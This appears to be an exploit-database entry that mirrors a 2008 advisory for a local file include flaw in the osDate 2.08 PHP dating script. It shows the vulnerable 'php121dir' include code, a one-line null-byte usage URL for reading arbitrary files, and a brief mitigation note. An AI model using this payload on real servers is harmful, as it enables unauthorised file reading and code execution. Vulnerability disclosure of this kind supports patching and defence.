header-logo
Suggest Exploit
vendor:
osDate
by:
Cold z3ro
7.5
CVSS
HIGH
Local File Include
98
CWE
Product Name: osDate
Affected Version From: 02.08
Affected Version To: 02.08
Patch Exists: YES
Related CWE: N/A
CPE: a:gscripts.net:osdate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

osData <= 2.08 Modules Php121 Local File Include Vulnerability

osData is a php dating script that is vulnerable to a local file include vulnerability. This vulnerability is due to the lack of proper sanitization of user-supplied input to the 'php121dir' parameter in the 'php121db.php' script. An attacker can exploit this vulnerability to include arbitrary files from the local system and execute arbitrary code.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

=========================================================================
osData <= 2.08 Modules Php121 Local File Include Vulnerability 
=========================================================================
Found by :
Cold z3ro , http://www.Hackteach.org/cc/
=========================================================================
Download :
http://gscripts.net/free-php-scripts/Dating_Scripts/osDate/details.html
=========================================================================
Bug :
if (file_exists($php121dir . "php121config.php")) {          <= line 34
		require_once($php121dir . "php121config.php");
	} else {
		die ("PHP121 configuration file does not exist!");
}
=========================================================================
About :
osData is php dating script fully integrates with major bulletin boards 
(phpBB, vBulletin ) and FlashChat and provides several payment modules, 
multiple skins, and free upgrade .
=========================================================================
Usage :
http://host/osData/php121/php121db.php?php121dir=[ File ]%00
=========================================================================
Greets : 
Hack Teach Masters And Members , Xp10 Masters
=========================================================================
Plestine Hackers SQl Command :
0 update palestine set palestine = 'Long live My Homeland';
=========================================================================

# milw0rm.com [2008-01-09]

Navigation

Suggest Exploit

Services By CQR